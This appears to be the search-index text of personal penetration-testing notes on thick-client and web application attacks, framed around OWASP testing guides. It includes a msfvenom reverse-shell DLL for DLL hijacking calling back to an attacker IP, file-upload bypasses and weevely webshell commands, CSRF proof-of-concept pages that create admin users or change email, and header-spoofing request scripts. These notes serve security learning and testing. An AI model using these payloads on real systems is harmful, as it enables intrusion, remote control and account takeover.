                                  **Test For Common Vulnerabilities**\n\n- [ ]  Try to decompile the application\n- [ ]  Try for reverse engineering\n- [ ]  Try to test with OWASP WEB Top 10\n- [ ]  Try to test with OWASP API Top 10\n- [ ]  Test for DLL Hijacking\n- [ ]  Test for signature checks (Use Sigcheck)\n- [ ]  Test for binary analysis (Use Binscope)\n- [ ]  Test for business logic errors\n- [ ]  Test for TCP/UDP attacks\n- [ ]  Test with automated scanning tools (Use Visual Code Grepper - VCG)\n
                                  ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#shaped-by-hariprasaanth-r","title":"Shaped by: Hariprasaanth R","text":"

                                  Reach Me: LinkedIn Portfolio Github

                                  ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/tools-for-thick-apps/","title":"Tools for pentesting thick client applications","text":"

                                  General index of the course

                                  • Introduction.
                                  • Tools for pentesting thick client applications.
                                  • Basic lab setup.
                                  • First challenge: enabling a button.
                                  • Information gathering phase.
                                  • Traffic analysis.
                                  • Attacking thick clients applications.
                                  • Reversing and patching thick clients applications.
                                  • Common vulnerabilities.
                                  ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#decompilation-tools","title":"Decompilation tools","text":"
                                  • C++ decompilation: https://ghidra-sre.org
                                  • C# decompilation: dnspy.
                                  • JetBrains dotPeek.
                                  ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#read-app-metadata","title":"Read app metadata","text":"
                                  • CFF explorer. Open the app with CFF Explorer to see which language and tool was used for its creation.
                                  ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#sniff-connections","title":"Sniff connections","text":"
                                  • TCP View from sysInternalsSuite.
                                  • Wireshark.
                                  ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#traffic-monitoring","title":"Traffic monitoring","text":"
                                  • wireshark, it's ok if we just want to monitor.
                                  • Echo mirage, very old and not maintained.
                                  • mitm_relay + BurpSuite.
                                  ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#static-analysis","title":"Static analysis","text":"","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#spot-hard-coded-credentials","title":"Spot hard coded credentials","text":"
• Strings from the Sysinternals Suite. It's similar to the \"strings\" command on Linux: it displays all the human-readable strings in a binary. See the example after this list.
                                  • dnspy can be used to spot functions containing hard coded credentials (for connections,...).
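A minimal sketch with the Sysinternals Strings tool (binary name illustrative; -n sets the minimum string length to report):

.\\strings.exe -n 8 .\\DVTA.exe | findstr /i \"password connection\"\n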
                                  ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#log-analysis","title":"Log analysis","text":"

                                  When debug mode is on, you can run:

                                  thick-app-name.exe > path/to/logs.txt\n
Open the file with the application logs and, if you are lucky and debug mode is still on, you will be able to see things such as SQL queries, decrypted database passwords, users, the temporary location of the FTP file...

                                  ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#dynamic-analysis","title":"Dynamic analysis","text":"","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#changes-in-the-file-system","title":"Changes in the file system","text":"
                                  • ProcessMonitor tool from sysInternalsSuite to see changes in the file system. For instance, you can analyze the access to interesting files in the application directory in real time.
                                  ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#spot-sensitive-data-in-registry-entries","title":"Spot sensitive data in Registry entries","text":"
                                  • ProcessMonitor tool from sysInternalsSuite to spot changes in the Registry Entries.
• regshot allows you to compare two snapshots of the registry entries (one taken before opening the application and one while the application is running).
                                  ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#check-the-memory","title":"Check the memory","text":"

Process Hacker. During a connection to the database, the code that performs it may handle the connection string in clear text or encrypted. If encrypted, it is still possible to find the clear-text value in memory: Process Hacker dumps the memory of the process, so we might find the clear-text connection string there.

                                  ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#scan-the-application","title":"Scan the application","text":"

                                  Visual Code grepper.

                                  ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#attacks","title":"Attacks","text":"","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#dll-hickjacking","title":"DLL Hickjacking","text":"

                                  Step by step.

                                  1. Locate interesting DLL files with ProcessMonitor (or ProcMon).

2. Craft a malicious DLL with msfvenom on the attacker machine (see the sketch after this list).

3. Serve it to the victim machine using an Apache server.

4. Place the file in the same directory from which it is going to be loaded.

                                  5. Run the app.
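A sketch of steps 2, 3 and the listener, assuming the lab attacker IP 10.0.2.15 and an illustrative DLL name (the payload must match the 32/64-bit architecture of the process that loads it):

# 2. Craft the malicious DLL on the attacker machine\nmsfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -f dll -o hijackme.dll\n# 3. Serve it (the course uses Apache; copy the DLL to the web root)\nsudo cp hijackme.dll /var/www/html/ && sudo systemctl start apache2\n# Catch the shell before running the app\nmsfconsole -q -x \"use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST 10.0.2.15; set LPORT 4444; run\"\n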

                                  ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#reversing-net-applications","title":"Reversing .NET applications","text":"
                                  • dnspy: c# code + IL code + patching the application
                                  • dotPeek (from JetBrains)
                                  • ILspy / Reflexil
                                  • ILASM (IL Assembler) (comes with .NET Framework).
                                  • ILDASM (IL Disassembler) (comes with Visual Studio).

                                  How to do it?

                                  ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#input-sanitization-sql-injections","title":"Input sanitization: SQL injections","text":"

                                  Manually
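A couple of classic manual probes for a login field (generic payloads, not specific to any application):

' or '1'='1\n' OR 1=1--\nadmin'--\n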

                                  ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#application-signing","title":"Application Signing","text":"

                                  Sigcheck, from SysInternals Suite (more).

                                  ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"thick-applications/tools-for-thick-apps/#compiler-protection","title":"Compiler protection","text":"

                                  Binscope.

                                  PESecurity is a powershell script that checks if a Windows binary (EXE/DLL) has been compiled with ASLR, DEP, SafeSEH, StrongNaming, Authenticode, Control Flow Guard, and HighEntropyVA.
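A usage sketch (module and function name as published in the NetSPI PESecurity repository; the binary path is illustrative):

Import-Module .\\Get-PESecurity.psm1\nGet-PESecurity -File C:\\path\\to\\DVTA.exe\n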

                                  Also, check these other tools and resources:

                                  • WinSpy.
                                  • Window Detective
                                  • netspi.com.
                                  ","tags":["thick client applications","thick client applications pentesting","tools"]},{"location":"webexploitation/","title":"Web exploitation guide","text":"OWASP Attack Tools Payloads WSTG-INPV-12 Command injection attack
• CRLF attack - Carriage Return and LineFeed attack
  • https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CRLF%20Injection
• WSTG-SESS-05 CSRF attack - Cross Site Request Forgery attack (tools: BurpSuite, CSRFTester)
  • PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSRF%20Injection
• Directory traversal attack
• LFI attack - Local File Inclusion attack
• Remote Code Execution
• RFD attack - Reflected File Download attack (tool: Reflected File Download Checker - Burp Extension)
• RFI attack - Remote File Inclusion attack
• Session Puzzling (tool: XSS-Me)
• SSRF attack - Server Side Request Forgery (tools: Burp Collaborator, Burp Intruder, manually; payloads: built-in lists in Burp)
• WSTG-INPV-05 SQL injection (tools: cheat sheet for manual attack, sqlmap; payloads: from my dictionary repo)
• XFS attack - Cross-frame Scripting attack
• WSTG-INPV-01 WSTG-INPV-02 WSTG-CLNT-01 XSS attack - Cross-Site Scripting attack (tools: beef, XSSer, Easy-XSS, manual testing, XSSMe tool on github)
  • OWASP: https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html
  • Portswigger: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
  • Unleashing an Ultimate XSS Polyglot: https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
  • https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection
  • https://github.com/payloadbox/xss-payload-list
  • https://gist.github.com/michenriksen/d729cd67736d750b3551876bbedbe626

                                        Public exploits

We can use these resources:

• searchsploit
• ExploitDB
• Rapid7.com
• Vulnerability Lab
• metasploit: check verification scripts to test the existence of a vulnerability.
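For example, with searchsploit (the query term and exploit ID are illustrative):

searchsploit openssh 7.2\n# -m mirrors (copies) an exploit to the current directory once you know its ID\nsearchsploit -m 40136\n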

                                        ","tags":["pentesting","web","pentesting","exploitation"]},{"location":"webexploitation/arbitrary-file-upload/","title":"Arbitrary File Upload","text":"OWASP

                                        OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.8. Test Upload of Unexpected File Types

ID / Link to Hackinglife / Link to OWASP / Description:

• 10.8 WSTG-BUSL-08 Test Upload of Unexpected File Types: Review the project documentation for file types that are rejected by the system. Verify that the unwelcomed file types are rejected and handled safely. Also check whether the website only checks the \"Content-Type\" header or the file extension. Verify that file batch uploads are secure and do not allow any bypass of the set security measures.
• 10.9 WSTG-BUSL-09 Test Upload of Malicious Files: Identify the file upload functionality. Review the project documentation to identify what file types are considered acceptable, and what types would be considered dangerous or malicious. If documentation is not available, consider what would be appropriate based on the purpose of the application. Determine how the uploaded files are processed. Obtain or create a set of malicious files for testing. Try to upload the malicious files to the application and determine whether they are accepted and processed.

                                        An arbitrary file upload vulnerability is a type of security flaw in web applications that allows an attacker to upload and execute malicious files on a web server. This can have serious consequences, including unauthorized access to sensitive data, server compromise, and even complete system control. The vulnerability arises when the application fails to properly validate and secure the uploaded files. This means that the application may not check if the uploaded file is actually of the expected type (e.g., image, PDF), or it may not restrict the file's location or execution on the server.

                                        Exploitation: An attacker identifies the file upload functionality in the target application and attempts to upload a malicious file. This file can be crafted to include malicious code, such as PHP scripts, shell commands, or malware.

Bypassing Validation: If the application doesn't properly validate file types or restrict file locations, the attacker can upload a file with a misleading extension (e.g., uploading a PHP file with a .jpg extension).

                                        ","tags":["pentesting","web","pentesting"]},{"location":"webexploitation/arbitrary-file-upload/#bypass-file-upload-restrictions","title":"Bypass file upload restrictions","text":"

Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code onto the system to be attacked; then the attacker only needs to find a way to get that code executed. Using a file upload helps the attacker accomplish the first step.

                                        ","tags":["pentesting","web","pentesting"]},{"location":"webexploitation/arbitrary-file-upload/#cheat-sheet-for-php","title":"Cheat sheet for php","text":"

Source: repo from imran-parray. OWASP deep explanation: link.

# Try to upload a simple php file\nupload.php\n\n# Bypass the blacklist with a double extension\nupload.php.jpeg\n\n# Bypass the blacklist: the last extension is php\nupload.jpg.php\n\n# Change the Content-Type of the request to image or jpeg\nupload.php\n\n# Append a php version number to the extension (upload.php1 ... upload.php7)\nupload.php*\n\n# Bypass the blacklist with mixed case\nupload.PHP\nupload.PhP\nupload.pHp\n\n# Upload a .htaccess file so that [jpg,png] files can be executed as php with malicious code within them\nupload .htaccess\n\n# Test against DoS: pixel flood image\npixelFlood.jpg\n\n# Upload a gif file with 10^10 frames\nframeflood.gif\n\n# Malicious zTXt chunk: upload UBER.jpg\n\n# Add a backdoor in the image comments using ExifTool (bypasses getimagesize() checks) and\n# rename the jpg file to .php so that it will be executed. This time the verification of the\n# server is only limited to the contents of the uploaded file, not the extension\nupload.php\n\n# Backdoor in php chunks\nphppng.png\nxsspng.png\n
                                        ","tags":["pentesting","web","pentesting"]},{"location":"webexploitation/arbitrary-file-upload/#execute-a-file-uploaded-as-an-image-in-nginx","title":"Execute a file uploaded as an image in nginx","text":"

                                        After bypassing a file upload feature (using .jpg extension but php mimetype), the file is treated by the application as an image.

                                        How to bypass that situation? This works in some versions of nginx server:

                                        # After the name of the file with the jpg extension, add slash and the name of the file with the uploaded and accepted mimetype php. After that you can use the CMD command of the webshell.\n\nhttps://example.com/uploads/lolo.jpg/lolo.php?cmd=pwd\n

                                        ","tags":["pentesting","web","pentesting"]},{"location":"webexploitation/arbitrary-file-upload/#tools","title":"Tools","text":"

Generate a php webshell with Weevely and save it as an image:

                                        weevely generate secretpassword example.png \n

                                        Upload it to the application.

                                        Make the connection with weevely:

                                        weevely https://example.com/uploads/example.jpg/example.php secretpassword\n

                                        ","tags":["pentesting","web","pentesting"]},{"location":"webexploitation/arbitrary-file-upload/#bypass-php-version-based-file-extension-filters-when-running-the-file","title":"Bypass PHP version-based file extension filters when running the file","text":"

Sometimes a web server may prevent some PHP files from running based on their PHP version. A way of bypassing this is to indicate, in the file extension, the version you want it to run under:

                                        shell.php7\n

In this case, the uploaded file would be executed as PHP 7.

                                        ","tags":["pentesting","web","pentesting"]},{"location":"webexploitation/broken-access-control/","title":"Broken access control","text":"OWASP

                                        OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.2. Testing for Bypassing Authorization Schema

ID / Link to Hackinglife / Link to OWASP / Description:

• 5.2 WSTG-ATHZ-02 Testing for Bypassing Authorization Schema: Assess whether horizontal or vertical access is possible. Try to access administrative functions by forced browsing (/admin/addUser).

Access control determines whether the user is allowed to carry out the action that they are attempting to perform. In the context of web applications, access control is dependent on authentication and session management.

• Authentication confirms that the user is who they say they are.
• Session management identifies which subsequent HTTP requests are being made by that same user.

                                        Types of broken access control:

                                        • Vertical access control: a regular user can access or perform operations on endpoints reserved for admins.
                                        • Horizontal access control: a regular user can access resources or perform operations belonging to other users.
                                        • Context-dependent access control: Context-dependent access controls restrict access to functionality and resources based upon the state of the application or the user's interaction with it. For example, a retail website might prevent users from modifying the contents of their shopping cart after they have made payment.
                                        ","tags":["web pentesting","attack"]},{"location":"webexploitation/broken-access-control/#exploitation","title":"Exploitation","text":"

                                        This is how you usually test these vulnerabilities:

                                        ","tags":["web pentesting","attack"]},{"location":"webexploitation/broken-access-control/#unprotected-functionality","title":"Unprotected functionality","text":"

                                        At its most basic, vertical privilege escalation arises where an application does not enforce any protection for sensitive functionality. Example: accessing the /admin panel (or a less obvious URL for the admin functionality).

                                        ","tags":["web pentesting","attack"]},{"location":"webexploitation/broken-access-control/#parameter-based-access-control-methods","title":"Parameter-based access control methods","text":"

                                        When the application makes access control decisions based on a submitted value.

                                        https://insecure-website.com/login/home.jsp?admin=true\n

                                        This approach is insecure because a user can modify the value and access functionality they're not authorized to, such as administrative functions. In the following example, I'm the user wiener, but I can access user carlos's information by modifying the id parameter in the request:

                                        GET /my-account?id=carlos HTTP/2\n

                                        Where GUIDs or obfuscated parameters are used, you can chain this with a data-exposure vulnerability that leaks valid identifiers, or with an IDOR.

                                        ","tags":["web pentesting","attack"]},{"location":"webexploitation/broken-access-control/#url-override-methods","title":"URL override methods","text":"

                                        There are\u00a0various non-standard HTTP headers that can be used to override the URL in the original request, such as\u00a0X-Original-URL\u00a0and\u00a0X-Rewrite-URL.

                                        If a website uses rigorous front-end controls to restrict access based on the URL, but the application allows the URL to be overridden via a request header, then:

                                        POST / HTTP/1.1\nHost: target.com\nX-Original-URL: /admin/deleteUser \n...\n
                                        ","tags":["web pentesting","attack"]},{"location":"webexploitation/broken-access-control/#url-matching-discrepancies","title":"URL-matching discrepancies","text":"

                                        Websites can vary in how strictly they match the path of an incoming request to a defined endpoint.

                                        • For example, they may tolerate inconsistent capitalization, so a request to\u00a0/ADMIN/DELETEUSER\u00a0may still be mapped to the\u00a0/admin/deleteUser\u00a0endpoint. If the access control mechanism is less tolerant, it may treat these as two different endpoints and fail to enforce the correct restrictions as a result.
                                        • The Spring framework, with the useSuffixPatternMatch option enabled, allows paths with an arbitrary file extension to be mapped to an equivalent endpoint with no file extension.
                                        • On other systems, you may encounter discrepancies in whether /admin/deleteUser and /admin/deleteUser/ are treated as the same endpoint; a trailing slash alone can be enough to bypass the control (a quick probe sketch follows this list).
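
                                        A quick way to check for these discrepancies is to request a handful of path variants and compare status codes. A minimal Node.js sketch, assuming a hypothetical target.example host and the /admin/deleteUser endpoint:

                                        const https = require('https');\nconst paths = ['/admin/deleteUser', '/ADMIN/DELETEUSER', '/admin/deleteUser/', '/admin/deleteUser.css'];\nfor (const p of paths) {\n    // Differing status codes across variants hint at a URL-matching bypass\n    https.get({ host: 'target.example', path: p }, res => console.log(p, '->', res.statusCode));\n}\n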
                                        ","tags":["web pentesting","attack"]},{"location":"webexploitation/broken-access-control/#idors","title":"IDORS","text":"

                                        IDORs occur if an application uses user-supplied input to access objects directly and an attacker can modify the input to obtain unauthorized access.

                                        ","tags":["web pentesting","attack"]},{"location":"webexploitation/broken-access-control/#abusing-referer-request-header","title":"Abusing Referer Request header","text":"

                                        The\u00a0Referer\u00a0header can be added to requests by browsers to indicate which page initiated a request.

                                        For example, an application robustly enforces access control over the main administrative page at\u00a0/admin, but for sub-pages such as\u00a0/admin/deleteUser\u00a0only inspects the\u00a0Referer\u00a0header. If the\u00a0Referer\u00a0header contains the main\u00a0/admin\u00a0URL, then the request is allowed.
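
                                        A minimal Node.js sketch of this test, assuming a hypothetical target.example host and the endpoint above; the Referer header is simply forged, since outside the browser nothing stops us from setting it:

                                        const https = require('https');\nconst req = https.request({\n    host: 'target.example',\n    path: '/admin/deleteUser?username=carlos',\n    headers: { 'Referer': 'https://target.example/admin' } // forged Referer\n}, res => console.log(res.statusCode));\nreq.end();\n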

                                        ","tags":["web pentesting","attack"]},{"location":"webexploitation/broken-access-control/#other-headers-to-consider-for-location-base-control","title":"Other Headers to Consider for location-base control","text":"

                                        Often admin panels or administration-related functionality are only accessible to clients on local networks, so it may be possible to abuse various proxy- or forwarding-related HTTP headers to gain access. Some headers and values to test with are listed below; a brute-force sketch follows the list:

                                        • Headers:
                                          • X-Forwarded-For
                                          • X-Forward-For
                                          • X-Remote-IP
                                          • X-Originating-IP
                                          • X-Remote-Addr
                                          • X-Client-IP
                                        • Values
                                          • 127.0.0.1\u00a0(or anything in the\u00a0127.0.0.0/8\u00a0or\u00a0::1/128\u00a0address spaces)
                                          • localhost
                                          • Any\u00a0RFC1918\u00a0address:
                                            • 10.0.0.0/8
                                            • 172.16.0.0/12
                                            • 192.168.0.0/16
                                          • Link local addresses:\u00a0169.254.0.0/16
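
                                        A minimal brute-force sketch in Node.js, assuming a hypothetical target.example host and a protected /admin path; any header/value pair that returns something other than 403 deserves a closer look:

                                        const https = require('https');\nconst headers = ['X-Forwarded-For', 'X-Forward-For', 'X-Remote-IP', 'X-Originating-IP', 'X-Remote-Addr', 'X-Client-IP'];\nconst values = ['127.0.0.1', 'localhost', '10.0.0.1', '172.16.0.1', '192.168.0.1', '169.254.0.1'];\nfor (const h of headers) {\n    for (const v of values) {\n        https.get({ host: 'target.example', path: '/admin', headers: { [h]: v } }, res => {\n            if (res.statusCode !== 403) console.log(h + ': ' + v + ' -> ' + res.statusCode);\n        });\n    }\n}\n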
                                        ","tags":["web pentesting","attack"]},{"location":"webexploitation/buffer-overflow/","title":"Buffer Overflow attack","text":"

                                        A buffer is an area in RAM (Random Access Memory) reserved for temporary data storage. If a developer does not enforce a buffer's limits, an attacker could find a way to write data beyond those limits.

                                        A stack is a data structure used to store data. It follows a LIFO (last in, first out) approach, in contrast to a queue's FIFO, and exposes two methods: push (adds elements to the stack) and pop (removes elements from the stack).

                                        ","tags":["web pentesting","attack"]},{"location":"webexploitation/captcha-replay-attack/","title":"Captcha Replay attack","text":"

                                        Captcha replay attack is a vulnerability in which the Captcha validation system accepts old Captcha values which have already expired. This is sometimes considered legitimate behavior (as would be expected if the user refreshed the browser after submitting a successful captcha), however in many cases, such functionality would make the captcha significantly less effective at preventing automation.

                                        In this case, the attacker resubmitted a request that had already been successfully validated through a captcha, and \"replay\" was explicitly disabled for the captcha. This is not necessarily a malicious incident on its own, because the user could have accidentally refreshed the browser; however, multiple attempts would clearly indicate malicious intent.

                                        ","tags":["web pentesting","attack"]},{"location":"webexploitation/carriage-return-and-linefeed-crlf/","title":"Carriage Return and Linefeed - CRLF Attack","text":"

                                        Source: Owasp description: https://owasp.org/www-community/vulnerabilities/CRLF_Injection.

                                        ","tags":["web pentesting","attack"]},{"location":"webexploitation/carriage-return-and-linefeed-crlf/#description","title":"Description","text":"

                                        A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL. CRLF is the acronym used to refer to Carriage Return (\\r) Line Feed (\\n). As one might notice from the symbols in the brackets, \u201cCarriage Return\u201d refers to the end of a line, and \u201cLine Feed\u201d refers to the new line.

                                        The term CRLF refers to Carriage Return (ASCII 13, \r) and Line Feed (ASCII 10, \n). They are used to note the termination of a line; however, they are dealt with differently in today's popular operating systems. For example, in Windows both a CR and an LF are required to note the end of a line, whereas in Linux/UNIX only an LF is required. In the HTTP protocol, the CR-LF sequence is always used to terminate a line.
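
                                        A minimal probe sketch in Node.js, assuming a hypothetical victim.example host that reflects the lang parameter into a response header: if the encoded CRLF (%0d%0a) splits the headers, the injected Set-Cookie shows up in the response:

                                        const http = require('http');\nhttp.get('http://victim.example/?lang=en%0d%0aSet-Cookie:%20crlf=1', res => {\n    console.log(res.headers['set-cookie']); // present only if the CRLF was injected\n});\n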

                                        ","tags":["web pentesting","attack"]},{"location":"webexploitation/carriage-return-and-linefeed-crlf/#tools-and-payloads","title":"Tools and payloads","text":"
                                        • See updated chart: Attacks and tools for web pentesting.
                                        ","tags":["web pentesting","attack"]},{"location":"webexploitation/cross-frame-scripting-xfs/","title":"XFS attack - Cross-frame Scripting","text":"","tags":["web pentesting","attack"]},{"location":"webexploitation/cross-frame-scripting-xfs/#tools-and-payloads","title":"Tools and payloads","text":"
                                        • See updated chart: Attacks and tools for web pentesting.
                                        ","tags":["web pentesting","attack"]},{"location":"webexploitation/cross-site-request-forgery-csrf/","title":"CSRF attack - Cross Site Request Forgery","text":"OWASP

                                        OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.5. Testing for Cross Site Request Forgery

                                        ID Link to Hackinglife Link to OWASP Description 6.5 WSTG-SESS-05 Testing for Cross Site Request Forgery - Determine whether it is possible to initiate requests on a user's behalf that are not initiated by the user. - Conduct URL analysis, Direct access to functions without any token.

                                        Cross Site Request Forgery (CSRF) is a type of web security vulnerability that occurs when an attacker tricks a user into performing actions on a web application without their knowledge or consent. A successful CSRF exploit can compromise end user data and operation when it targets a normal user. If the targeted end user is the administrator account, a CSRF attack can compromise the entire web application.

                                        CSRF vulnerabilities may arise when applications rely solely on HTTP cookies to identify the user that has issued a particular request. Because browsers automatically add cookies to requests regardless of the request's origin, it may be possible for an attacker to create a malicious web site that forges a cross-domain request to the vulnerable application.

                                        Three conditions that enable CSRF:

                                        • A relevant action.
                                        • Cookie-based session handling.
                                        • No unpredictable request parameters.
                                        ","tags":["web","pentesting","attack","HTTP","headers"]},{"location":"webexploitation/cross-site-request-forgery-csrf/#how-it-works","title":"How it works","text":"
                                        The attacker crafts a malicious request (e.g., changing the user's email address or password) and embeds it in a web page, email, or some other form of content.\n\nThe attacker lures the victim into loading this content while the victim is authenticated in the target web application.\n\nThe victim's browser automatically sends the malicious request, including the victim's authentication cookie.\n\nThe web application, trusting the request due to the authentication cookie, processes it, causing the victim's account to be compromised or modified.\n

                                        CSRF attacks can have serious consequences:

                                        • Unauthorized changes to a user's account settings.
                                        • Fund transfers or actions on behalf of the user without their consent.
                                        • Malicious actions like changing passwords, email addresses, or profile information.
                                        ","tags":["web","pentesting","attack","HTTP","headers"]},{"location":"webexploitation/cross-site-request-forgery-csrf/#how-to-test-csrf-by-using-burpsuite-proof-of-concept","title":"How to test CSRF by using Burpsuite proof of concept","text":"

                                        Burp has a quite awesome PoC generator, so you can generate HTML (and JavaScript) code to replicate this attack.

                                        1. Select a URL or HTTP request anywhere within Burp, and choose Generate CSRF PoC within Engagement tools in the context menu.

                                        2. You have two buttons: one to regenerate the HTML manually based on the updated request (Regenerate button), and the other to test the effectiveness of the generated PoC in Burp's browser (Test in browser button).

                                        3. Open the crafted page from the same browser where the user has been logged in.

                                        4. Observe the result, i.e. check if the web server executed the request.

                                        ","tags":["web","pentesting","attack","HTTP","headers"]},{"location":"webexploitation/cross-site-request-forgery-csrf/#fetch-api","title":"Fetch API","text":"

                                        Requirements:

                                        1. Authentication Method should be cookie based only
                                        2. No Authentication Token in Header
                                        3. Same-Origin Policy should not be enforced

                                        Browser -> Network tab in development tools, right click on request and copy as fetch:
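
                                        As an illustration, the copied fetch can be adapted into a cross-site PoC like the following (hypothetical endpoint and parameters); with cookie-only authentication, the victim's browser attaches the session cookie automatically:

                                        // Hosted on the attacker's page; fires from the victim's authenticated browser\nfetch('https://vulnerable.example/account/email', {\n    method: 'POST',\n    credentials: 'include', // attach the victim's cookies\n    headers: { 'Content-Type': 'application/x-www-form-urlencoded' },\n    body: 'email=attacker@evil.example'\n});\n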

                                        ","tags":["web","pentesting","attack","HTTP","headers"]},{"location":"webexploitation/cross-site-request-forgery-csrf/#json-csrf","title":"Json CSRF","text":"

                                        Resources: https://systemweakness.com/ways-to-exploit-json-csrf-simple-explanation-5e77c403ede6

                                        POC: source rootsploit.com

                                        # Change the URL and Body from the PoC file to perform the CSRF on JSON Endpoint.\n<html>\n<title>CSRF Exploit POC by RootSploit</title>\n\n<body>\n    <center>\n        <h1> CSRF Exploit POC by RootSploit</h1>\n\n        <script>\n            function JSON_CSRF() {\n                fetch('https://vuln.rootsploit.io/v1/addusers', { method: 'POST', credentials: 'include', headers: { 'Content-Type': 'application/json' }, body: '{\"user\":{\"role_id\":\"full_access\",\"first_name\":\"RootSploit\",\"last_name\":\"RootSploit\",\"email\":\"csrf-test@rootsploit.com\",\"password\":\"Password@\",\"confirm_password\":\"Password@\",\"mobile_number\":\"99999999999\"}}' });\n                window.location.href=\"https://rootsploit.com/csrf\"\n            }\n        </script>\n\n        <button onclick=\"JSON_CSRF()\">Exploit CSRF</button>\n    </center>\n</body>\n\n</html>\n
                                        ","tags":["web","pentesting","attack","HTTP","headers"]},{"location":"webexploitation/cross-site-request-forgery-csrf/#mitigation","title":"Mitigation","text":"

                                        Cross-Site Request Forgery Prevention Cheat Sheet

                                        ","tags":["web","pentesting","attack","HTTP","headers"]},{"location":"webexploitation/cross-site-request-forgery-csrf/#related-labs","title":"Related labs","text":"
                                        • https://portswigger.net/web-security/all-labs#cross-site-request-forgery-csrf
                                        ","tags":["web","pentesting","attack","HTTP","headers"]},{"location":"webexploitation/cross-site-request-forgery-csrf/#resources","title":"Resources","text":"

                                        When it comes to web vulnerabilities, it is useful to have some links at hand:

                                        • Owasp vuln description: https://owasp.org/www-community/attacks/csrf.
                                        • Using Burp to Test for Cross-Site Request Forgery (CSRF): https://portswigger.net/support/using-burp-to-test-for-cross-site-request-forgery.
                                        • PoC with Burp, official link: https://portswigger.net/burp/documentation/desktop/functions/generate-csrf-poc.
                                        ","tags":["web","pentesting","attack","HTTP","headers"]},{"location":"webexploitation/cross-site-request-forgery-csrf/#tools-and-payloads","title":"Tools and payloads","text":"
                                        • See updated chart: Attacks and tools for web pentesting.
                                        ","tags":["web","pentesting","attack","HTTP","headers"]},{"location":"webexploitation/cross-site-scripting-xss/","title":"XSS attack - Cross-Site Scripting","text":"OWASP reference

                                        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.2. Testing for Stored Cross Site Scripting

                                        ID Link to Hackinglife Link to OWASP Description 7.1 WSTG-INPV-01 Testing for Reflected Cross Site Scripting - Identify variables that are reflected in responses. - Assess the input they accept and the encoding that gets applied on return (if any). 7.2 WSTG-INPV-02 Testing for Stored Cross Site Scripting - Identify stored input that is reflected on the client-side. - Assess the input they accept and the encoding that gets applied on return (if any). 11.1 WSTG-CLNT-01 Testing for DOM-Based Cross Site Scripting - Identify DOM sinks. - Build payloads that pertain to every sink type. Sources for these notes
                                        • My INE notes: eWPTv2.
                                        • Hacktricks.
                                        • XSS Filter Evasion Cheat Sheet.
                                        • OWASP: WSTG.
                                        • Notes during the Cibersecurity Bootcamp at The Bridge.
                                        • Experience pentesting applications.

                                        Cross-Site scripting (XSS) is a client-side web vulnerability that allows attackers to inject malicious scripts into web pages. This vulnerability is typically caused by a lack of input sanitization/validation in web applications. Attackers leverage XSS vulnerabilities to inject malicious code into web applications. Because XSS is a client-side vulnerability, these scripts are executed by the victim's browser. XSS vulnerabilities affect web applications that lack input validation and that leverage client-side scripting languages like JavaScript, Flash, CSS, etc.

                                        # Quick steps to test XSS \n# 1. Find a reflection point (inspect source code and expand all tags to make sure that it's really a reflection point and it's not parsing your input)\n# 2. Test with <i> tag\n# 3. Test with HTML/JavaScript code (alert('XSS'))\n

                                        But, of course, you may use an extensive repository of payloads. This OWASP cheat sheet is kind of a bible.

                                        XSS attacks are typically exploited for the following objectives:

                                        1. Cookie stealing/Session hijacking - Stealing cookies from users with authenticated sessions, allowing you to login as other users by leveraging the authentication information contained within a cookie.
                                        2. Browser exploitation - Exploitation of browser vulnerabilities.
                                        3. Keylogging - Logging keyboard entries made by other users on a web application.
                                        4. Phishing - Injecting fake login forms into a webpage to capture credentials.
                                        5. ... and many more.
                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#types-of-cross-site-scripting-xss","title":"Types of Cross-Site Scripting XSS","text":"

